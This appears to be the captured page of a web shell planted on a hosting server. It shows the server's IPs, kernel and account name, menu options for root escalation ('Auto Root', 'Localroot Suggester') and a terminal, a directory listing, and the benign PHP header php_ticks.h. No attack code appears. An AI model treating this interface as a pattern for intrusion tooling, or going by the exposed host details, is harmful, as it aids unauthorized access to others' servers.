Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php82 /
usr /
include /
php /
main /
Delete
Unzip
Name
Size
Permission
Date
Action
streams
[ DIR ]
drwxr-xr-x
2025-08-15 19:28
SAPI.h
10.01
KB
-rw-r--r--
2025-07-11 10:35
build-defs.h
6.58
KB
-rw-r--r--
2025-07-11 10:35
fastcgi.h
4.78
KB
-rw-r--r--
2025-07-11 10:35
fopen_wrappers.h
2.2
KB
-rw-r--r--
2025-07-11 10:35
http_status_codes.h
2.83
KB
-rw-r--r--
2025-07-11 10:35
php.h
11.51
KB
-rw-r--r--
2025-07-11 10:35
php_compat.h
19.66
KB
-rw-r--r--
2025-07-11 10:35
php_config.h
49.01
KB
-rw-r--r--
2025-07-11 10:35
php_content_types.h
1.31
KB
-rw-r--r--
2025-07-11 10:35
php_getopt.h
1.63
KB
-rw-r--r--
2025-07-11 10:35
php_globals.h
3.84
KB
-rw-r--r--
2025-07-11 10:35
php_ini.h
3.53
KB
-rw-r--r--
2025-07-11 10:35
php_ini_builder.h
2.73
KB
-rw-r--r--
2025-07-11 10:35
php_main.h
2.21
KB
-rw-r--r--
2025-07-11 10:35
php_memory_streams.h
3.23
KB
-rw-r--r--
2025-07-11 10:35
php_network.h
10.46
KB
-rw-r--r--
2025-07-11 10:35
php_odbc_utils.h
1.27
KB
-rw-r--r--
2025-07-11 10:35
php_open_temporary_file.h
1.91
KB
-rw-r--r--
2025-07-11 10:35
php_output.h
8.83
KB
-rw-r--r--
2025-07-11 10:35
php_reentrancy.h
3.16
KB
-rw-r--r--
2025-07-11 10:35
php_scandir.h
1.67
KB
-rw-r--r--
2025-07-11 10:35
php_streams.h
29.49
KB
-rw-r--r--
2025-07-11 10:35
php_syslog.h
1.54
KB
-rw-r--r--
2025-07-11 10:35
php_ticks.h
1.34
KB
-rw-r--r--
2025-07-11 10:35
php_variables.h
2.07
KB
-rw-r--r--
2025-07-11 10:35
php_version.h
266
B
-rw-r--r--
2025-07-11 10:35
rfc1867.h
3.14
KB
-rw-r--r--
2025-07-11 10:35
snprintf.h
5.6
KB
-rw-r--r--
2025-07-11 10:35
spprintf.h
1.47
KB
-rw-r--r--
2025-07-11 10:35
Save
Rename
/* +----------------------------------------------------------------------+ | Copyright (c) The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | https://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Author: Stig Bakken <ssb@php.net> | +----------------------------------------------------------------------+ */ #ifndef PHP_TICKS_H #define PHP_TICKS_H int php_startup_ticks(void); void php_deactivate_ticks(void); void php_shutdown_ticks(php_core_globals *core_globals); void php_run_ticks(int count); BEGIN_EXTERN_C() PHPAPI void php_add_tick_function(void (*func)(int, void *), void *arg); PHPAPI void php_remove_tick_function(void (*func)(int, void *), void * arg); END_EXTERN_C() #endif